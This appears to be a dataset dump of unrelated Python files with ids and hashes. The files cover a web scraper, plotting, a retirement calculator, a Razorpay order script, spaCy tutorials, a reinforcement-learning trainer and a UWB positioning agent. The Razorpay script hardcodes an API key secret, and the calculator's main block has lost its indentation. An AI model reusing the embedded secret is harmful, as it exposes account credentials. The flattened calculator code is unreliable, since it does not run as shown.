            continue
    if i == max_tries:
        print("Aborting after {}".format(max_tries) + " tries")
        quit()
    # The downloadable file sits in the div following the "Versions" heading.
    h2 = html.find("h2", text="Versions")
    if h2:
        div = h2.findNext("div")
        links = div.findAll("a")
        if len(links) > 1:
            print("Warning: More than one link found. Downloading only the first file.")
        zipfile = links[0].attrs["href"]
        downloads.append({"Title": title, "URL": zipfile})
        print("\t".join([title, url, zipfile]))
    else:
        no_downloads.append((title, url))
if len(no_downloads) > 0:
    print("No downloads for ", no_downloads)
driver.close()
df = pd.DataFrame(downloads)
df.to_csv(root / "data/submissions-{}.csv".format(year), index=False)
|
997,717 | ac809f0dcb62b96d8f413ae3cb779743489d2a43 | import numpy as np
import matplotlib.pyplot as plt
# Sample one period and draw a half-amplitude cosine and a full sine curve.
theta = np.linspace(-np.pi, np.pi, 200)
half_cos = np.cos(theta) / 2
sine = np.sin(theta)
for curve, dash, width, colour in ((half_cos, "-", 1, "red"),
                                   (sine, ":", 2.5, "green")):
    plt.plot(theta, curve, linestyle=dash, linewidth=width, color=colour)
plt.show() |
997,718 | 8746b00b6ad68ca94c2c90038259db1c795b64b9 | ### Test : warehouses_clients.py ==> OK
import time
from warehouses_clients import *
# Smoke-test script for the warehouse/client helpers and the routing helpers.
# NOTE(review): the bare expressions (df_warehouses, df_complete) only display
# anything in a notebook/REPL; this looks like exported notebook cells.
# Warehouses
df_warehouses
# "random_clients" function
start_time = time.time()
df_complete, indexes = random_clients(5)
print("Temps d'exécution : %s secondes ---" % (time.time() - start_time))
print(f"indexes : {indexes}")
df_complete
### Test : routes.py ==> OK
from routes import *
# 'nearest_nodes' function
coords_list, nearest_nodes_list = nearest_nodes(df_complete)
print(f'coords_list : {coords_list} \n')
print(f'nearest_nodes_list : {nearest_nodes_list}')
# 'itineraries' function ==> slow but it works
coords_list, weight_array, itineraries_dict = itineraries(df_complete)
print(f'coords_list : {coords_list} \n')
print(f'weight_array : \n {weight_array} \n')
print(f'itineraries_dict : \n {itineraries_dict}') |
997,719 | a8fc01ceea8829fad4f5ad398d8e555afd53a54d | """
Name: Priyanka Gnanasekaran
Class: CS 521 - Fall 1
Date:10/8/2020
Final Project - Home Expense & Retirement Calculator
"""
#Requirement: The class must be imported by main program
from gpriyan_final_classes import Monthly
import datetime
print("\nHome Expense and Retirement Calculator.\n")
#Requirement: User-Defined Functions
def retire_calc(current_savings,current_age,retirement_age,
                avg_annual_return,yearly_contribution):
    '''Compute the projected retirement balance and return it (rounded to
    cents).

    Today's savings compound for the whole horizon, and each yearly
    contribution compounds from the year it is made until retirement.
    avg_annual_return is a growth ratio (1.07 means 7% per year).
    '''
    #Requirement: assert unit test
    assert retirement_age >= current_age, 'Please enter your valid age!'
    horizon = retirement_age - current_age
    #retirement main calculation
    # Grow the existing savings over the full horizon.
    balance = current_savings * ((avg_annual_return) ** (horizon))
    # Add each contribution, compounded for the years it stays invested.
    while horizon > 0:
        horizon -= 1
        balance += yearly_contribution * (avg_annual_return ** horizon)
    balance = round(balance,2)
    assert balance != 0, 'Please enter valid data!'
    #Requirement: assert unit test
    return balance
if __name__ == "__main__":
print("\nPlease enter your choice of calculation:(e.g m for monthly)")
u_choi=input("Bi-weekly = bw, Weekly = w,"
"\nMonthly = m, Semi-Monthly = sm:")
u_choi=u_choi.lower() #taking input as lower case
#Requirement: Iteration type WHILE and FOR
while u_choi.isalnum():
#Requirement: try blocks
try:
#calcuations for four types of income.
#Requirement: Conditional IF
if u_choi == 'bw':
salary_in= float(input("Please Enter your Bi-weekly income:$"))
Expense=input("Type bi-weekly expenses with space inbetween:")
G_expense = Expense.split()
#sum of all expenses in list
#Requiement: container type and iteration type
g_expense=sum([float(e) for e in G_expense])
print("\nTotal Amount spent for this bi-week:$",g_expense)
#instantiate class methods
res= Monthly.bi_weekly_cal(salary_in,g_expense)
print("Amount saved per year:$",round(res,2))
elif u_choi== 'm':
salary_in= float(input("Please Enter your monthly income:$"))
Expense=input("Type monthly expenses with spaces inbetween:")
G_expense = Expense.split()
#sum of all expenses in list
#Requiement: container type and iteration type
g_expense=sum([float(e) for e in G_expense])
print("\nTotal Amount spent for this month:$",g_expense)
#instantiate class Monthly
rest = Monthly(salary_in,g_expense)
print((rest))
elif u_choi == 'w':
salary_in= float(input("Please Enter your weekly income:$"))
Expense=input("Type weekly expenses with spaces inbetween:")
G_expense = Expense.split()
#sum of all expenses in list
#Requiement: container type anf iteration type
g_expense=sum([float(e) for e in G_expense])
print("\nTotal Amount spent this week:$",g_expense)
#calling class method
res= Monthly.weekly_cal(salary_in,g_expense)
print("Amount saved per year:$",round(res,2))
elif u_choi == 'sm':
salary_in= float(
input("Please Enter your semi-months income:$"))
Expense=input("Type semi-month expenses with space inbetween:")
G_expense = Expense.split()
#sum of all expenses in list
#Requiement: container type and iteration type
g_expense=sum([float(e) for e in G_expense])
print("\nTotal Amount spent for this semi-month:$",g_expense)
#calling class method
res= Monthly.semimon_cal(salary_in,g_expense)
print("Amount saved per year:$",round(res,2))
elif u_choi == 'r':
#Retirement calculations
print("\nRetirement calculation.")
u_name=input("Enter your name for record reference:")
current_savings=float(
input("Enter current saving for retirement:"))
current_age=float(
input ("Enter your current age:"))
retirement_age=float(
input ("Enter your desired retirement age:"))
yearly_contribution=float(
input("Enter yearly contribution:"))
print("\nAverage annual return is a ratio:",
" 1.07 is a 7% annual return")
avg_annual_return=float(
input("Enter the average annual return:"))
#calling retire_calc fuction
retire_amt = retire_calc(float(current_savings),
float(current_age),
float(retirement_age),float(avg_annual_return),
float(yearly_contribution))
#printing retirement amount
age= retirement_age - current_age
print("\nHi {}!! In {} years, the retirement amount will be: {}"
.format(u_name,int(age),retire_amt))
#Requirement: Input and/or Output file
#Saving the retirement calculated amount in a file.
new_file= open("new_test.txt","a+")
print("\nHi {name}! In {age} years retirement amount will be:"
"${amt} record saved on {dt}".format(
name=u_name,
age=int(age),
amt=retire_amt,
dt=(datetime.datetime.now().strftime('%Y-%m-%d %H:%M')))
,file = new_file)
new_file.close() #close the files.
#Testing the input file for existence and
#printing an error message, if the file does not exist.
print("\nText file has been updated!!")
report =input("Do you want to review your file type Yes or No:")
report = report.lower()
if report == 'yes':
new_temp_file= open("new_test.txt","r")
if new_temp_file != 0:
file_content = new_temp_file.read()
print(file_content)
print("\nThank you for using Home Expense ",
"& Retirement Calculator.")
break
else:
print("file doesn't exists")
new_temp_file.close() #close the file.
elif report == 'no':
print("\nThank you for using Home Expense",
" & Retirement Calculator.")
break
else:
print("Error: Please enter a valid choice")
break
print("\nPlease enter your choice of calculation:")
u_choi=input("Bi-weekly = bw, Weekly = w,"
"\nMonthly = m, Semi-Monthly = sm, Retirement = r:")
#Requirement: try-except blocks
except TypeError:
print("TypeError: Please enter a valid input")
break
#Requirement: try-except blocks
except ValueError:
print("ValueError: Please enter a valid input")
break
else:
print("Error: Please enter a valid choice") |
997,720 | 02cd5d962be16ea57367d110cd7a6d89d6225ecc | keyid = 'rzp_test_ixIzmpmVcqXV1J'
keySecret = 'fCwpPR7wrXeClCzZjA7adlKg'
# NOTE(review): the API key secret above is committed in source; move it to an
# environment variable or config file before sharing/deploying (the 'rzp_test_'
# key id indicates Razorpay test mode).
import razorpay
# Client authenticated with the key id/secret pair defined above.
client = razorpay.Client(auth=(keyid,keySecret))
data ={
    # Amount is in the smallest currency unit: 100 INR expressed in paise.
    'amount' : 100*100,
    "currency": "INR",
    "receipt" : "TSC",
    "notes":{
        "name": "TEJAS",
        "Payment_for" : "IOT"
    }
}
# Create the order server-side and echo Razorpay's response.
order = client.order.create(data=data)
print(order)
#client.utility.verify_payment_signature(params_dict) |
997,721 | ed70839ed32df6b446f5c526fe64647f1ea572fa | #!/usr/bin/env python
import os
import toml
from setuptools import setup, find_packages
REQUIREMENTS_FILE = 'requirements.txt'
README_FILE = 'README.md'
PYPROJECT_FILE = 'pyproject.toml'
SETUP_KWARGS = [
    'name',
    'version',
    'description',
    'author',
    'authors',
    'author_email',
    'license',
    'url',
    'project_urls',
    'download_url',
    'keywords',
    'classifiers',
    'packages',
    'include',
    'extras_require',
    'include_package_data',
    'python_requires',
]
INCLUDE = ['pyproject.toml', 'init.py']
EXCLUDE_PACKAGE = ['tests*']
def get_requirements():
    """Return the install requirements as a list of stripped lines from
    requirements.txt, or an empty list if the file does not exist."""
    if not os.path.isfile(REQUIREMENTS_FILE):
        # No requirements file: nothing extra to install.
        return []
    with open(REQUIREMENTS_FILE) as reqs:
        return [line.strip() for line in reqs]
def get_setup_kwargs(default=None):
    """Assemble the keyword arguments for setup() from the README, the
    requirements file, pyproject.toml's poetry table, and an optional
    *default* override dict."""
    with open(README_FILE, 'r', encoding='utf-8') as fd:
        readme_text = fd.read()
    kwargs = {
        'long_description': readme_text,
        'install_requires': get_requirements(),
        'include': INCLUDE,
        'packages': find_packages(exclude=EXCLUDE_PACKAGE),
    }
    if isinstance(default, dict):
        kwargs.update(default)
    # Merge the poetry table: new keys are copied; existing list/dict values
    # are extended/updated in place; other collisions keep the earlier value.
    poetry_table = dict(toml.load(PYPROJECT_FILE)['tool']['poetry'])
    for key, value in poetry_table.items():
        if key not in SETUP_KWARGS:
            continue
        if key not in kwargs:
            kwargs[key] = value
        elif isinstance(kwargs[key], list):
            kwargs[key].extend(value)
        elif isinstance(kwargs[key], dict):
            kwargs[key].update(value)
    return kwargs
def main():
    """Console entry point: run setuptools.setup() with the derived kwargs."""
    setup(**get_setup_kwargs())
if __name__ == '__main__':
    main()
|
997,722 | 063d2224cb083832ef287a42955e51af46e38ff7 | # A Span is a slice of a Doc consisting of one or more tokens.
# Span takes at least three arguments:
#the doc it refers to, and the start and end index of the span.
# Remember that the end index is exclusive!
# Tutorial notes (not a runnable script top-to-bottom): nlp is used below
# before it is first assigned further down — NOTE(review).
# Manually create a Span
from spacy.tokens import Span
doc = nlp("Hello world!")
span = Span(doc, 0, 2)
# Create a span with a label
span_with_label = Span(doc, 0, 2, label="GREETING")
# Add span to the doc.ents (entities)
doc.ents = [span_with_label]
# Example: Create a Doc *manually*
# 1
import spacy
nlp = spacy.load("en_core_web_sm")
# Import the Doc class
from spacy.tokens import Doc
# Desired text: "spaCy is cool!"
words = ["spaCy", "is", "cool", "!"]
spaces = [True, True, False, False]
# Create a Doc from the words and spaces
doc = Doc(nlp.vocab, words=words, spaces=spaces)
print(doc.text)
# 2
import spacy
nlp = spacy.load("en_core_web_sm")
# Import the Doc class
from spacy.tokens import Doc
# Desired text: "Go, get started!"
words = ["Go", ",", "get", "started", "!"]
spaces = [False, True, True, False, False]
# Create a Doc from the words and spaces
doc = Doc(nlp.vocab, words=words, spaces=spaces)
print(doc.text)
# 3
import spacy
nlp = spacy.load("en_core_web_sm")
# Import the Doc class
from spacy.tokens import Doc
# Desired text: "Oh, really?!"
words = ["Oh", ",", "really", "?", "!"]
spaces = [False, True, False, False, False]
# Create a Doc from the words and spaces
doc = Doc(nlp.vocab, words=words, spaces=spaces)
print(doc.text)
# Example: Create a Doc + Span
from spacy.lang.en import English
nlp = English()
# Import the Doc and Span classes
from spacy.tokens import Doc, Span
words = ["I", "like", "David", "Bowie"]
spaces = [True, True, True, False]
# Create a doc from the words and spaces
doc = Doc(nlp.vocab, words=words, spaces=spaces)
print(doc.text)
# Create a span for "David Bowie" from the doc and assign it the label "PERSON"
span = Span(doc, 2, 4, label="PERSON")
print(span.text, span.label_)
# Add the span to the doc's entities
doc.ents = [span]
# Print entities' text and labels
print([(ent.text, ent.label_) for ent in doc.ents])
# Example: identify proper noun followed by a verb
import spacy
nlp = spacy.load("en_core_web_sm")
doc = nlp("Berlin is a nice city")
# Get all tokens and part-of-speech tags
token_texts = [token.text for token in doc]
pos_tags = [token.pos_ for token in doc]
for token in doc:
    # Check if the current token is a proper noun
    if token.pos_ == "PROPN":
        # Check if the next token is a 'VERB'
        # NOTE(review): doc[token.i + 1] raises IndexError when the proper
        # noun is the last token of the doc.
        if doc[token.i + 1].pos_ == "VERB":
            print("Found proper noun before a verb:", token.text)
|
997,723 | 935a02b0bb535778dfdd0f2f14e71e12b6f4478c | """
INFO8003-1
2020 - 2021
Final Project
Inverted Double Pendulum
François LIEVENS - 20103816
Julien HUBAR - 10152485
In this file we are implementing a simple Neural
network using fully connected layers in order to
approximate our non-linear Q-value function.
"""
import torch
import gym
import pybullet_envs
import numpy as np
from ActorCriticNeural import ActorCriticNeural
import time
import os
from Learner import Learner
import pandas as pd
from torch.distributions import Categorical
GRAPHICAL = False        # render the PyBullet GUI and sleep between frames
TIME_STEP = 1/1000       # delay between rendered frames, in seconds
NB_EPISODE = 10000       # number of training episodes per trainer() call
MAX_EPI_LEN = 1000       # hard cap on steps per episode
DEVICE = 'cuda:0'        # torch device used for the network and tensors
DISCOUNT = 0.8           # reward discount factor (gamma)
SAVE_INTERVAL = 1000     # save a checkpoint every N episodes
STATE_SIZE = 9           # dimension of the environment observation
NB_ACTONS = 50           # size of the discretized action set (sic: "ACTIONS")
LEARNING_RATE = 2e-6     # optimizer learning rate
EPSILON = 0.2            # exploration parameter (currently unused here)
DROPOUT = 0              # dropout rate passed to the network
def trainer(name='PGRAD_A'):
    """Train the actor-critic policy on the inverted double pendulum.

    Restores the latest checkpoint from ``<name>/model`` when one exists,
    runs up to NB_EPISODE episodes, appends per-episode statistics to
    ``<name>/tracking.csv`` and saves the network every SAVE_INTERVAL
    episodes.

    :param name: folder prefix used for checkpoints and tracking output
    """
    # Get the environment
    env = gym.make("InvertedDoublePendulumBulletEnv-v0")
    # Get the policy network
    AC_Network = ActorCriticNeural(name=name, device=DEVICE, state_size=STATE_SIZE,
                                   nb_actions=NB_ACTONS, lr=LEARNING_RATE,
                                   dropout=DROPOUT).to(DEVICE)
    # Try to restore the most recent model if one exists
    mod_lst = os.listdir('{}/model'.format(name))
    restored = False
    if len(mod_lst) > 0:
        mod_lst_idx = []
        for itm in mod_lst:
            try:
                mod_lst_idx.append(int(itm.replace('.pt', '')))
            except ValueError:
                # Skip files that are not numbered checkpoints
                pass
        max_idx = max(mod_lst_idx)
        print('Already existing model found, try to restore idx {}'.format(max_idx))
        try:
            AC_Network.restore(add=max_idx)
            # BUGFIX: record the successful restore so the episode counter
            # resumes from the tracking file below (the flag was never set).
            restored = True
            print('Model successfully restored')
        except Exception:
            print('Fail to restore existing model. Maybe corrupted? ')
            exit(-1)
    if GRAPHICAL:
        env.render(mode='human')
    start_epi_idx = 0
    # Restore the last episode index from the tracking file when resuming
    if restored:
        # BUGFIX: the path was missing .format(name), and DataFrame has no
        # .numpy(); resume from the episode column of the last logged row.
        df = pd.read_csv('{}/tracking.csv'.format(name), sep=';', header=None).to_numpy()
        start_epi_idx = int(df[-1, 0])
    end_epi_idx = start_epi_idx + NB_EPISODE
    # A learner object to perform learning steps (kept: constructor wires the model)
    learner_obj = Learner(model=AC_Network, discounter=DISCOUNT)
    # Main loop
    track_duration = []
    track_reward = []
    for e in range(start_epi_idx, end_epi_idx):
        print('======= Episode {}/{} ========='.format(e, end_epi_idx))
        # Per-episode buffers: log-probs, rewards, critic values, entropies
        tot_log_prbs = []
        tot_rewards = []
        tot_critic_val = []
        tot_entropy = []
        # Reinit the env
        obs = torch.Tensor(env.reset()).to(DEVICE)
        # Episode loop
        epi_idx = 0
        while epi_idx < MAX_EPI_LEN:
            if GRAPHICAL:
                time.sleep(TIME_STEP)
            # Get critic value and action probabilities
            AC_Network.train()
            critic_val, prbs = AC_Network.forward(obs.view(1, STATE_SIZE))
            np_prbs = prbs.cpu().detach().numpy()
            tot_critic_val.append(critic_val)
            # Sample the next action from the predicted distribution
            action = np.random.choice(NB_ACTONS, p=np.squeeze(np_prbs))
            # Get actuator value
            actuator_val = AC_Network.actions[action]
            # Log-probability of the chosen action (policy-gradient term)
            log_prbs = torch.log(prbs.squeeze(0)[action])
            tot_log_prbs.append(log_prbs)
            # Entropy of the prediction, used later as an exploration bonus
            entropy = Categorical(probs=prbs).entropy()
            tot_entropy.append(entropy)
            # Perform the action
            new_obs, r, done, _ = env.step([actuator_val])
            obs = torch.Tensor(new_obs).to(DEVICE)
            tot_rewards.append(r)
            # End of the episode: log statistics and leave the inner loop
            if done or epi_idx == MAX_EPI_LEN - 1:
                track_duration.append(epi_idx)
                track_reward.append(np.sum(tot_rewards))
                file = open('{}/tracking.csv'.format(name), 'a')
                file.write('{};{};{};{}\n'.format(e, track_duration[-1], track_reward[-1],
                                                  entropy.cpu().detach().item()))
                file.close()
                print('Episode {} : Duration {} - Total reward {} - Entropy: {}'.format(
                    e, track_duration[-1], track_reward[-1], entropy.cpu().detach().item()))
                if len(track_duration) > 10:
                    print('AVG 10 last duration: {} / Rewards: {}'.format(np.mean(track_duration[-10:-1]),
                                                                          np.mean(track_reward[-10:-1])))
                break
            epi_idx += 1
        # Discounted cumulative rewards, computed backwards
        cum_rew = np.zeros(len(tot_rewards))
        idx = len(tot_rewards) - 1
        cum_rew[idx] = tot_rewards[idx]
        while idx > 0:
            idx -= 1
            cum_rew[idx] = tot_rewards[idx] + DISCOUNT * cum_rew[idx + 1]
        # Actor critic update:
        val = torch.stack(tot_critic_val).to(DEVICE)
        cum_rew = torch.Tensor(cum_rew).to(DEVICE)
        log_prbs = torch.stack(tot_log_prbs).to(DEVICE)
        # Advantage = discounted return - critic baseline
        adv = cum_rew - val
        # Loss = policy gradient + critic MSE + entropy regularisation
        final_entropy = torch.stack(tot_entropy).mean()
        print('entropy: ', final_entropy.cpu().detach().item())
        loss = torch.mean((-1 * log_prbs) * adv) + (0.5 * torch.mean(adv ** 2)) + (100 / (final_entropy + 1e-8))
        # Optimize
        AC_Network.optimizer.zero_grad()
        loss.backward()
        AC_Network.optimizer.step()
        print('loss: ', loss.cpu().detach().item())
        # Model saving
        if e % SAVE_INTERVAL == 0 and e != 0:
            AC_Network.save(add=e)
if __name__ == "__main__":
trainer() |
997,724 | 9b24745bd13c8c1c765eeb98e97283123f95a46a | import os
import tqdm
import json
import argparse
import torch
import numpy as np
import pandas as pd
# from functools import partial
# from multiprocessing.pool import ThreadPool
from torch.utils.data import DataLoader
from models.smp import SegmentModel, ClassifyModel
from datasets.inference import InferenceDataset
from datasets.classify import SegmentBasedClassifyDataset
from utils.postprocess import DilateSigmoidPostProcess
from utils.postprocess import DilateSoftmaxPostProcess
def predict(Model, Dataset):
    """Entry point: build model and dataset from CLI args, then run Predictor.

    :param Model: model class to instantiate (e.g. ClassifyModel)
    :param Dataset: dataset class to instantiate
    """
    args = parse_args()
    cls_prefix = args.cls_prefix
    with open(args.config_path) as f:
        cfg = json.load(f)
    # Inference always requires a checkpoint
    cfg["model"]["load_ckpt"] = True
    assert cfg["model"]["load_ckpt"]
    model = get_model(cfg, Model)
    dataset = get_dataset(args, cfg, Dataset)
    # Select the post-processing named in the configuration.
    # NOTE(review): if neither name matches, `postprocess` stays unbound and
    # the Predictor call below raises NameError — confirm allowed configs.
    if "DilateSigmoidPostProcess" in cfg["postprocess"]:
        postprocess = DilateSigmoidPostProcess([1, 1])
    elif "DilateSoftmaxPostProcess" in cfg["postprocess"]:
        postprocess = DilateSoftmaxPostProcess([1, 1])
    Predictor(
        args=args,
        cfg=cfg,
        model=model,
        dataset=dataset,
        postprocess=postprocess,
        cls_prefix=cls_prefix,
    )
def get_model(cfg, Model):
    """Instantiate *Model* from the ``model`` section of the configuration."""
    model_cfg = cfg["model"]
    print(model_cfg)
    return Model(model_cfg)
def get_dataset(args, cfg, Dataset):
    """Build the validation dataset described by ``cfg['dataset']``.

    The dataset is always created in evaluation mode and with the full
    catheter set (``catheters='total'``).
    """
    print("Prepare dataset...")
    dataset_cfg = cfg["dataset"]
    print(dataset_cfg)
    dataset_cfg["catheters"] = "total"
    return Dataset(args.data_path, **dataset_cfg, is_train=False)
class Predictor:
    """Runs batched GPU inference over a dataset and writes per-class CSVs."""
    def __init__(
        self,
        args,
        cfg,
        model,
        dataset,
        postprocess,
        cls_prefix,
    ):
        """Wire everything up and immediately run the prediction loop."""
        print("Setting Arguments...", args)
        self.args = args
        self.cfg = cfg
        self.cls_prefix = cls_prefix
        # Accumulators filled batch by batch in predict()
        self.cls_output = []
        self.cls_target = []
        self.path_list = []
        self.data_path = self.args.data_path
        self.batch_size = 64
        self.set_device()
        self.load_checkpoint()
        self.prepare_model(model, postprocess)
        self.prepare_datapipeline(dataset)
        self.predict()
    def set_device(self):
        # CUDA-only: no CPU fallback is provided
        self.device = "cuda"
    def load_checkpoint(self):
        """Load the checkpoint given on the command line, if any."""
        if self.args.checkpoint is not None:
            print("Load checkpoint...", self.args.checkpoint)
            self.state = torch.load(self.args.checkpoint)
        else:
            # NOTE(review): prepare_model reads self.state when
            # cfg["model"]["load_ckpt"] is true — it would fail on this path.
            print("No checkpoint will be loaded.")
    def prepare_model(self, model, postprocess):
        """Wrap model parts in DataParallel, move to GPU and load weights."""
        print("Prepare model...")
        print("Model configuring...")
        cfg = self.cfg["model"]
        self.model = model
        self.model.encoder = torch.nn.DataParallel(
            self.model.encoder,
            # device_ids=self.device_ids,
        )
        # Segmentation models carry a decoder; pure classifiers do not
        if hasattr(model, "decoder"):
            self.model.decoder = torch.nn.DataParallel(
                self.model.decoder,
                # device_ids=self.device_ids,
            )
        self.model.classification_head = torch.nn.DataParallel(
            self.model.classification_head,
            # device_ids=self.device_ids,
        )
        self.model = self.model.to(self.device, dtype=torch.float32)
        if cfg["load_ckpt"]:
            print("Load model state...")
            self.model.load_state_dict(self.state["model"], strict=False)
        else:
            print("No model state dict will be loaded.")
        self.postprocess = postprocess
    def prepare_datapipeline(self, dataset):
        """Build the evaluation DataLoader (no shuffling, keep last batch)."""
        self.dataset = dataset
        # prepare dataloader
        print("Prepare dataloader...")
        self.dataloader = DataLoader(
            self.dataset,
            batch_size=self.batch_size,
            shuffle=False,
            num_workers=32,
            drop_last=False,
            prefetch_factor=1,
        )
    def predict(self):
        """Run the model over every batch, then dump accumulated results."""
        print("Start predicting...")
        with torch.no_grad():
            self.model.eval()
            num_batchs = len(self.dataloader)
            for row, inputs, target in tqdm.tqdm(self.dataloader,
                                                 total=num_batchs):
                for k in inputs:
                    inputs[k] = inputs[k].to("cuda")
                # inference
                output = self.model(inputs)
                # post-process
                output, target = self.postprocess(output, target)
                self.update(row, output, target)
        self.save_cls()
    def update(self, row, output, target):
        """Append one batch worth of outputs, targets and file paths."""
        for k in output["cls"]:
            output["cls"][k] = output["cls"][k].cpu().detach().numpy()
            self.cls_output.append(output["cls"][k])
            self.cls_target.append(target["cls"][k])
        self.path_list.extend(row["Path"])
    def save_cls(self):
        """Concatenate accumulated arrays and write output/target CSVs."""
        cfg = self.cfg["dataset"]["findings"]
        task_name = self.args.task_name
        for k in cfg:
            print(cfg[k])
            output = np.concatenate(self.cls_output, axis=0)
            output = pd.DataFrame(output, columns=cfg[k])
            target = np.concatenate(self.cls_target, axis=0)
            target = pd.DataFrame(target, columns=cfg[k])
            output["Path"] = self.path_list
            target["Path"] = self.path_list
            output.to_csv(
                f"./results/{task_name}/{self.cls_prefix}_output.csv",
                index=False)
            target.to_csv(
                f"./results/{task_name}/{self.cls_prefix}_target.csv",
                index=False)
def parse_args():
    """Define and parse the command-line arguments of the prediction script."""
    parser = argparse.ArgumentParser()
    parser.add_argument("--cls_prefix", type=str)
    parser.add_argument("--task_name", type=str)
    parser.add_argument('--gpus', type=str, help='specify which GPUs to use.')
    parser.add_argument('--workers', type=int, default=32,
                        help='number of workers')
    parser.add_argument('--checkpoint', type=str, default=None,
                        help='pytorch checkpoint file path')
    parser.add_argument("--config_path", type=str)
    parser.add_argument("--data_path", type=str)
    return parser.parse_args()
if __name__ == "__main__":
predict(ClassifyModel, SegmentBasedClassifyDataset)
|
997,725 | 164e05981b0733702ac4cb9c230a1dbfe0e9e76a | #!/usr/bin/env python
from shapely.geometry import Point, LineString, Polygon
import math
import numpy as np
import matplotlib.pyplot as plt
class uwb_agent:
    """UWB ranging agent: tracks neighbour distances and the graph they form.

    M     : known module ids (self first)
    N     : neighbour ids
    E     : last measured range to each neighbour (parallel to N)
    P     : edge weights, in the order of self.pairs
    pairs : [id1, id2, range] triplets, one per known edge
    """
    def __init__(self, ID, pos):
        self.id = ID
        self.pos = pos
        self.incidenceMatrix = np.array([])
        self.M = [self.id]
        self.N = []
        self.E = []
        self.P = []
        self.pairs = []
        self.I = np.array([[1, 0], [0, 1]])

    def get_distance(self, remote_pos):
        """Euclidean distance from our position to *remote_pos*."""
        p1 = self.pos
        p2 = remote_pos
        return math.sqrt((p2.x - p1.x) ** 2 + (p2.y - p1.y) ** 2)

    def update_incidenceMatrix(self):
        """Rebuild the node/edge incidence matrix and edge-weight list P."""
        self.incidenceMatrix = np.array([])
        self.P = []
        rows = len(self.M)
        cols = len(self.pairs)
        self.incidenceMatrix = np.zeros((rows, cols), dtype=int)
        for i, pair in enumerate(self.pairs):
            col = np.zeros(rows, dtype=int)
            # +1 on the source node, -1 on the target node of the edge
            col[pair[0]] = 1
            col[pair[1]] = -1
            self.incidenceMatrix[:, i] = col.T
            self.P.append(pair[2])

    # NOTE: the parameter name 'range' shadows the builtin; it is kept
    # because external callers pass it by keyword.
    def add_nb_module(self, Id, range):
        """Register a neighbour, or refresh its range if already known."""
        if not any(x == Id for x in self.N):
            self.N.append(Id)
            self.E.append(range)
            self.M.append(Id)
            self.pairs.append([self.id, Id, range])
        else:
            # BUGFIX: E is parallel to N, so it must be indexed by the
            # neighbour's position in N, not by its raw id.
            self.E[self.N.index(Id)] = range
            for pair in self.pairs:
                if any(x == Id for x in pair) and any(x == self.id for x in pair):
                    pair[2] = range

    def add_pair(self, Id1, Id2, range):
        """Store the measured range for the edge (Id1, Id2).

        BUGFIX: the previous bookkeeping appended a duplicate entry even
        when the pair already existed (its counter check was always true);
        now an existing edge is updated in place and only unknown edges
        are appended.
        """
        for pair in self.pairs:
            if (pair[0] == Id1 and pair[1] == Id2) or (pair[1] == Id1 and pair[0] == Id2):
                pair[2] = range
                return
        self.pairs.append([Id1, Id2, range])

    def handle_range_msg(self, Id, nb_pos):
        """Measure the range to a neighbour at *nb_pos* and update the graph."""
        range = self.get_distance(nb_pos)
        self.add_nb_module(Id, range)
        self.update_incidenceMatrix()

    def handle_other_msg(self, Id1, Id2, range):
        """Record a range reported between two other agents."""
        self.add_pair(Id1, Id2, range)
        self.update_incidenceMatrix()

    def define_triangle(self, a, b, c):
        """Place a triangle with side lengths a, b, c in a local frame.

        Returns the three corner Points plus the three interior angles
        (law of cosines), with corner A at the origin and B on the x-axis.
        """
        angle_a = math.acos((b ** 2 + c ** 2 - a ** 2) / (2 * b * c))
        angle_b = math.acos((a ** 2 + c ** 2 - b ** 2) / (2 * a * c))
        angle_c = math.acos((a ** 2 + b ** 2 - c ** 2) / (2 * a * b))
        A = Point(0.0, 0.0)
        B = Point(c, 0.0)
        C = Point(b * math.cos(angle_a), b * math.sin(angle_a))
        return A, B, C, angle_a, angle_b, angle_c

    def define_rectangle(self):
        """Position four agents from the six pairwise ranges stored in P."""
        a, b, c, d, e, f = self.P
        A, B, C, angle_a1, angle_b1, _ = self.define_triangle(a, b, c)
        angle_a2 = math.acos((b ** 2 + c ** 2 - a ** 2) / (2 * b * c))
        # Fourth corner mirrored below the AB axis
        D = Point(b * math.cos(angle_a2), -b * math.sin(angle_a2))
        return A, B, C, D
def run():
    """Placeholder entry point; currently performs no work."""
    return None
if __name__ == "__main__":
    # Demo: agent A at the origin ranges against three remote agents, then
    # receives the remotes' pairwise ranges and reconstructs the geometry.
    A = uwb_agent(ID=0, pos=Point(0,0))
    B = uwb_agent(ID=1, pos=Point(3,4))
    C = uwb_agent(ID=2, pos=Point(1,5))
    D = uwb_agent(ID=3, pos=Point(6,2))
    # Direct ranges from A to each neighbour
    A.handle_range_msg(Id=B.id, nb_pos=B.pos)
    A.handle_range_msg(Id=C.id, nb_pos=C.pos)
    A.handle_range_msg(Id=D.id, nb_pos=D.pos)
    # Ranges reported between the other agents
    A.handle_other_msg(Id1=B.id, Id2=C.id, range=B.get_distance(C.pos))
    A.handle_other_msg(Id1=B.id, Id2=D.id, range=B.get_distance(D.pos))
    A.handle_other_msg(Id1=C.id, Id2=D.id, range=C.get_distance(D.pos))
    # Reconstruct the four corner positions from the six pairwise ranges
    p1, p2, p3, p4 = A.define_rectangle()
    x = [p1.x, p2.x, p3.x, p4.x]
    y = [p1.y, p2.y, p3.y, p4.y]
    print("A: ", p1.x, p1.y, " B: ", p2.x, p2.y, " C: ", p3.x, p3.y, " D: ", p4.x, p4.y)
    print(A.pairs)
    print(A.incidenceMatrix)
    print(A.P)
    plt.scatter(x,y)
    plt.show()
|
997,726 | 832e2cf88094e76fbfa6264b0756bb9cae736b66 | import os
from dotenv import load_dotenv
# Load variables from a local .env file into the process environment
load_dotenv()
# Directory containing this configuration module
CONFIG_PATH = os.path.dirname(os.path.realpath(__file__))
RESOURCES_FOLDER = os.path.join(CONFIG_PATH, 'resources')
# Watson Machine Learning connection settings (URL falls back to us-south)
WML_SERVICE_URL = os.getenv('WML_SERVICE_URL', 'https://us-south.ml.cloud.ibm.com')
WML_SERVICE_API_KEY = os.getenv('WML_SERVICE_API_KEY')
WML_SPACE_UID = os.getenv('WML_SPACE_UID')
# Credentials dict in the shape expected by the WML client
WML_CREDENTIALS = {
    "url": WML_SERVICE_URL,
    "apikey": WML_SERVICE_API_KEY
}
WML_DEPLOYMENT_ID = os.getenv('WML_DEPLOYMENT_ID')
|
997,727 | 82fa5b9546ebb53a5d158aca6a771b17033365fc | import logging
logger = logging.getLogger('restserver.rest_core')
class ApiError(Exception):
    """Base class for REST API errors rendered as JSON payloads.
    Subclasses provide ``code`` (HTTP status) and a default ``_message``.
    """
    _message = ''
    def __init__(self, **kwargs):
